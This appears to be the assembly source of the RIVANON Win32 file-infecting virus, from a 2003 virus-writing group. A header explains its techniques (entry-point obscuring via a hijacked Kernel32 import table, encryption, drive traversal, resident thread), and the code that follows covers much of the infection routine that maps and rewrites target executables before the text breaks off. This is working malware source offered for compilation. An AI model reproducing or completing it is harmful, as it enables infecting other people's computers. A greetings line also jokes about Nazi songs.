;RIVANON virus, version 3.9 by Doxtor L. [TKT], June 2003.
;Contact: doxtorl38@yahoo.fr
;This source code is intended to be compiled using FASM, an open source
;assembler easily available on the web.
;Some not so usual features:
;* This virus don't change entry point of infected programs.
;* This virus don't patch opcodes of infected programs.
;* This virus don't change section attributes of infected programs.
;Here a list of some standard features used:
;* Use of a thread to make the virus 'resident'.
;* Use of hash codes to retrieve functions of Kernel32 needed.
;* Use of a traversal directory routine to parse all drives.
;* Use of SEH to make the virus more stable.
;* Use of the last section to put the main part of virus.
;* Use of encryption with a 'random' key.
;* Use of mutex to avoid to have several instances of virus infecting
; in same time.
;How does this virus work?
;This virus is my new attempt to use a non-standard E.P.O (entry point
;obscuring) technique. My last attempt in the same way was the writing of
;idele virus. Unfortunately this virus was a bit limited to not say buggy.
;I think RIVANON virus fixes the main 'bug' of idele virus yet RIVANON was
;totally re-written.
;The idea is to create a new import table therefore the 'old' table will be
;not changed when Windows will load the program in memory but the program will
;continue to 'believe' this table is still alright.The 'old' table can be fill
;up with addresses we want. These addresses will be pointing to addresses of
;elements of a 'push table'. What's that?
;When a host program will call a function from Kernel32 several push's will be
;executed depending on which function is called. The number of push's executed
;will be used to know which function of Kernel32 was called by host program.
;Sometimes, Idele virus wasn't able to know which function was called.
;After the push's, there is a small routine used to decrypt and allocate some
;memory to put the main part of virus there. GlobalAlloc function from
;Kernel32 is used to achieve this. For Windows this function is the only one
;imported from Kernel32 by an infected program.
;The virus will put a loader routine in the end of code section of target
;programs. A data section with 'writeable' attribute will be used to put the
;new 'import table'. The main code will be put in the end of last section.
;This virus was tested on both Windows98 SE and Windows 2000.
;Main tests were performed on notepad.exe and calc.exe from Windows98,
;These programs when they were infected were still running fine on both
;Windows 98 and Windows 2000. For Windows XP i don't have a clue because
;i don't use it.
;Here a list of macros and subroutines used:
;* proc_infectieuse : start of thread code
;* GEN_ALEATOIRE ; random generator
;* RECHERCHE_CIBLE_DANS_REPERTOIRE_COURANT : routine to find targets
; in current directory
;* INFECTION : routine to modify target
;* proc_seh : seh handler
;* copie_chaine : routine to copy ASCII
; string null terminated.
;* rva_vers_adr_map ; rva to map address routine
;* adr_map_vers_rva ; map address to rva routine
;* aligne ; align section size fields
;* debut_loader ; loader routine
;The source code has some comments in french. Anyway, this source code
;isn't intended to be read by beginners in vx world. The advanced vxers
;don't really need comments to understand how this code works, the code is
;enough structured to make it readable without comments.
;DISCLAIMER:
;This program is a virus, it's not destructive but has ability to infect
;all O.S Win32 based computers. I don't release this source code to be used
;to infect innocent user puters. It was created for research aims.
;Your are the only responsible if you decide to run it.
;IF YOU DON'T KNOW WHAT YOU'RE DOING, DON'T COMPILE IT!
;Greetings:
;Virusbuster : Thanks to publish my stuff.
;Lord Julus : For your working search traversal routine.
;Darkman : A good nazi can sing Horst Vessel lied by heart.
;Morphie : Too bad we didn't meet in Paris.
;Gigabyte : Editing a vx e-zine is a hard job you're right.
;Toofic : I'm not a pervert old man.
;Mandrag0re : Who's the next to be hacked?
;Emper0r : Thanks to publish my stuff in IOC.
;Delly : A good magician can make disappear everything..but you're
; the greatest, you can make appear weed everywhere!
;Cryptic : I remember i must install my network card.
;Gato : I hope everything is alright now, no news from you.
;Slagehammer : A new sample for your collection.
;Vecna : I'm wondering what is your contribution to 29a7!
;And all members of TKT group
;IN MEMORY OF T2
format PE GUI
entry commencement
include 'include\macro\import.inc'
include 'include\macro\stdcall.inc'
include 'include\exehdr.inc'
include 'include\kernel.inc'
DEBUG=TRUE
ADR_BASE=400000h
ALIGNEMENT_FICHIER_STANDARD=200h
ALIGNEMENT_MEMOIRE_STANDARD=1000h
DUREE_PAUSE1=120000
DUREE_PAUSE2=30000
MODULE=4235536237
SIGNATURE_VIRAL equ 'VX'
if DEBUG=TRUE
TYPE_FICHIER_RECHERCHE0 equ 'e'
SEH=FALSE
display "YOU'RE COMPILING THE DEBUG VERSION OF RIVANON VIRUS",CRLF
else
TYPE_FICHIER_RECHERCHE0 equ '*'
SEH=TRUE
display "YOU'RE COMPILING INFECTIOUS VERSION OF RIVANON VIRUS",CRLF
end if
display "IF YOU DON'T KNOW WHAT YOU'RE DOING PLEASE ERASE THIS PROGRAM",CRLF
TYPE_FICHIER_RECHERCHE1 equ 'x.ex'
TOUT_FICHIER equ '*'
REMONTE equ '..'
REPERTOIRE_COURANT equ '.'
REPERTOIRE_PARENT equ REMONTE
DERNIER_3_BIT=111b
;'strutures':
IMAGE_DOS_HEADER ecx,edx,edi
IMAGE_FILE_HEADER ecx,edx,esi
IMAGE_OPTIONAL_HEADER edx,edi
IMAGE_SECTION_HEADER esi,edi
IMAGE_DATA_DIRECTORY eax,esi
IMAGE_IMPORT_DESCRIPTOR esi
IMAGE_IMPORT_BY_NAME eax
IMAGE_EXPORT_DIRECTORY eax
WIN32_FIND_DATA edi,eax
adr_mem_alloc dd 0
;macros utilisees par le virus:
macro GEN_ALEATOIRE
{
;Pseudo-random step: seed <- (seed * seed) mod MODULE.
;The author describes this as "based on BBS"; the code only shows a fixed
;32-bit constant MODULE as the modulus, so the BBS claim is not established here.
;All general registers are saved and restored around the computation, so the
;only visible effect is the update of the dword at [seed+ebp]; nothing is
;returned in a register.
;[seed+ebp]: ebp appears to act as a relocation base for the code's own
;variables -- confirm against the callers.
pushad
mov ebx,MODULE ;divisor for the reduction
mov eax,[seed+ebp]
mul eax ;edx:eax = seed^2 (unsigned 64-bit product)
div ebx ;edx = seed^2 mod MODULE; the quotient in eax is discarded
mov [seed+ebp],edx ;the remainder becomes the new seed
popad
}
;[Debut du code de la fonction principale du virus]:
macro INFECTION
{
infection:
pushad
if SEH=TRUE
push ebp
lea eax,[proc_seh+ebp]
push eax dword [fs:0]
mov dword [fs:0],esp
end if
;[Ouverture du fichier cible et creation de son image memoire]:
lea edi,[struct_recherche+ebp]
lea esi,[edi.WFD_szFileName]
stdcall [SetFileAttributesA+ebp],esi,FILE_ATTRIBUTE_NORMAL
add dword [edi.WFD_nFileSizeLow],TAILLE_VIRUS_ALIGNE_FICHIER
xor ebx,ebx
stdcall [CreateFileA+ebp],esi,GENERIC_READ or GENERIC_WRITE,\
FILE_SHARE_READ,ebx,OPEN_EXISTING,ebx,ebx
inc eax
jz err_infection
dec eax
mov [handle_fichier_cible+ebp],eax
stdcall [CreateFileMappingA+ebp],eax,ebx,PAGE_READWRITE,ebx,\
dword [edi.WFD_nFileSizeLow],ebx
test eax,eax
jz err_infection
mov [handle_map_cible+ebp],eax
stdcall [MapViewOfFile+ebp],eax,FILE_MAP_ALL_ACCESS,ebx,ebx,ebx
test eax,eax
jz err_infection
mov [adr_map_cible+ebp],eax
mov edx,eax
;[Fin de la creation de l'image memoire du fichier cible]
;[Debut de la verification du fichier cible]:
cmp word [edx.MZ_magic],MZ_MAGIC
jnz err_infection
movzx eax,word [edx.MZ_csum]
cmp word [edx.MZ_csum],SIGNATURE_VIRAL
jz err_infection
mov eax,dword [edx.MZ_lfanew]
cmp eax,dword [edi.WFD_nFileSizeLow]
jae err_infection
add edx,eax
mov [adr_map_IMAGE_FILE_HEADER_cible+ebp],edx
cmp dword [edx.FH_Signature],PE_MAGIC
jnz err_infection
;[Debut de la recherche de la section 'code', la section qui contient
;le point d'entree du programme cible]:
movzx ebx,word [edx.FH_SizeOfOptionalHeader]
movzx ecx,word [edx.FH_NumberOfSections]
push ecx
add edx,sizeof.IMAGE_FILE_HEADER
mov [adr_map_IMAGE_OPTIONAL_HEADER_cible+ebp],edx
mov dword [edx.OH_FileAlignment],ALIGNEMENT_FICHIER_STANDARD
mov eax,dword [edx.OH_ImageBase]
mov [adr_image_base+ebp],eax
;a partir d'ici la variable adr_image_base concerne la cible
mov eax,dword [edx.OH_AddressOfEntryPoint]
add edx,ebx
mov [adr_map_IMAGE_SECTION_HEADER_cible+ebp],edx
mov esi,edx
recherche_section_code:
cmp dword [esi.SH_VirtualAddress],eax
ja section_code_trouve
add esi,sizeof.IMAGE_SECTION_HEADER
loop recherche_section_code
jmp err_infection
section_code_trouve:
;[Fin de la routine de recherche de la section 'code];
;[Debut de la localisation d'un espace 'vide' et de sa taille dans
;la fin de la section 'code']:
mov edi,dword [esi.SH_PointerToRawData]
add edi,[adr_map_cible+ebp]
dec edi
std
xor eax,eax
xor ecx,ecx
dec ecx
rep scasb
neg ecx
sub ecx,10 ;pour tenir compte de la presence eventuelle d'une
add edi,10 ;'table d'import' (celle ci se finissant par db 0,0,0,0)
mov [nbre_octet_libre_sect_code_cible+ebp],ecx
mov [adr_map_espace_libre_sect_code_cible+ebp],edi
sub esi,sizeof.IMAGE_SECTION_HEADER
call aligne
pop ecx
;si la section code a l'attribut ecriture mieux vaut abandonner l'infection:
test dword [esi.SH_Characteristics],IMAGE_SCN_MEM_WRITE
jnz err_infection
;[Fin de la localisation d'un espace dans la section 'code']
;[Debut de la localisation d'un espace vide a la fin d'une section 'data']:
mov esi,edx
recherche_section_data:
test dword [esi.SH_Characteristics],IMAGE_SCN_MEM_WRITE
jnz section_data_trouve
add esi,sizeof.IMAGE_SECTION_HEADER
loop recherche_section_data
jmp err_infection
section_data_trouve:
cmp dword [esi.SH_PointerToRawData],0
jz recherche_section_data
dec ecx
jz err_infection
inc ecx
mov edi,dword [esi.SH_PointerToRawData+sizeof.IMAGE_SECTION_HEADER]
add edi,[adr_map_cible+ebp]
sub edi,4
cmp dword [edi],0
jnz recherche_section_data
sub edi,4
cmp dword [edi],0
jnz recherche_section_data
mov [adr_map_espace_libre_sect_data_cible+ebp],edi
call aligne
;[Fin de la localisation d'un espace vide dans la section 'data']
;[Recherche de le structure IMAGE_IMPORT_DESCRIPTOR dediee aux imports
;de Kernel32]:
mov edx,[adr_map_IMAGE_OPTIONAL_HEADER_cible+ebp]
lea esi,[edx+sizeof.IMAGE_OPTIONAL_HEADER+sizeof.IMAGE_DATA_DIRECTORY]
;esi pointe sur la structure IMAGE_DATA_DIRECTORY dediee a l'import:
mov esi,dword [esi.DD_VirtualAddress]
stdcall rva_vers_adr_map,esi
mov esi,eax
sub esi,sizeof.IMAGE_IMPORT_DESCRIPTOR
recherche_k32_image_import_descriptor:
add esi,sizeof.IMAGE_IMPORT_DESCRIPTOR
mov edi,dword [esi.ID_Name]
test edi,edi
jz err_infection
stdcall rva_vers_adr_map,edi
mov edi,eax
cmp dword [edi],'KERN'
jnz recherche_k32_image_import_descriptor
add edi,4
cmp dword [edi],'EL32'
jnz recherche_k32_image_import_descriptor
mov [adr_map_IMAGE_IMPORT_DESCRIPTOR_cible+ebp],esi
;[Fin de la recherche de la structure IMAGE_IMPORT_DESCRIPTOR]
mov eax,[esi.ID_FirstThunk]
push eax
add eax,[adr_image_base+ebp]
mov [adr_1st_thunk_avant_infection_hote+ebp],eax
pop eax
stdcall rva_vers_adr_map,eax
mov [adr_map_1st_thunk_k32_cible+ebp],eax
mov esi,dword [esi.ID_OriginalFirstThunk]
test esi,esi
jz err_infection
mov [rva_orig_1st_thunk_avant_infection_hote+ebp],esi
stdcall rva_vers_adr_map,esi
mov [adr_map_original_1st_thunk_k32_cible+ebp],eax
;[Debut du calcul du nombre de fonctions de Kernel32 importees par le
;programme cible]:
mov esi,eax
mov edi,eax
cld
xor eax,eax
xor ecx,ecx
dec ecx
repne scasd
neg ecx
dec ecx
dec ecx
mov [nbre_fct_k32_cible+ebp],ecx
lea ebx,[ecx+TAILLE_LOADER+2*sizeof.IMAGE_THUNK_DATA]
mov ecx,[nbre_octet_libre_sect_code_cible+ebp]
sub ecx,ebx
jl err_infection
add [adr_map_espace_libre_sect_code_cible+ebp],ecx
;[Fin du calcul du nombre de fonctions importees de Kernel32]
mov ebx,esi
;[Recherche d'une fonction de Kernel32 importee par la cible
;dont le nom a au moins 11 symboles]:
xor ebx,ebx
dec ebx
recherche_nom_fct_k32_cible:
inc ebx
lodsd
test eax,eax
jz err_infection
mov [rva_IMAGE_IMPORT_BY_NAME_cible+ebp],eax
mov ecx,eax
stdcall rva_vers_adr_map,eax
lea edi,[eax.IBN_Name]
mov edx,edi
pushad
xor eax,eax
xor ecx,ecx
mov cl,11
repne scasb
popad
jz recherche_nom_fct_k32_cible
;[Fin de la verification du fichier cible]
pushad
mov esi,edx
mov word [esi-2],0
mov [index_fct_k32_altere_hote+ebp],ebx
lea edi,[sz_nom_fct_k32_altere_hote+ebp]
call copie_chaine
lea esi,[sz_nom_globalalloc+ebp]
mov edi,edx
call copie_chaine
popad
;[Fin de la recherche d'une fonction de Kernel32 importee dont le nom a au
;moins 11 symboles]
;mov edi,[adr_map_espace_libre_sect_code_cible+ebp]
mov edi,[adr_map_espace_libre_sect_data_cible+ebp]
stdcall adr_map_vers_rva,edi
mov ebx,eax
mov eax,[rva_IMAGE_IMPORT_BY_NAME_cible+ebp]
stosd ;la RVA de la structure IMAGE_IMPORT_BY_NAME de Kernel32 est
;transferee dans la section code. La RVA de l'emplacement
;contenant ceci sera la nouvelle valeur FirstThunk de la
;cible.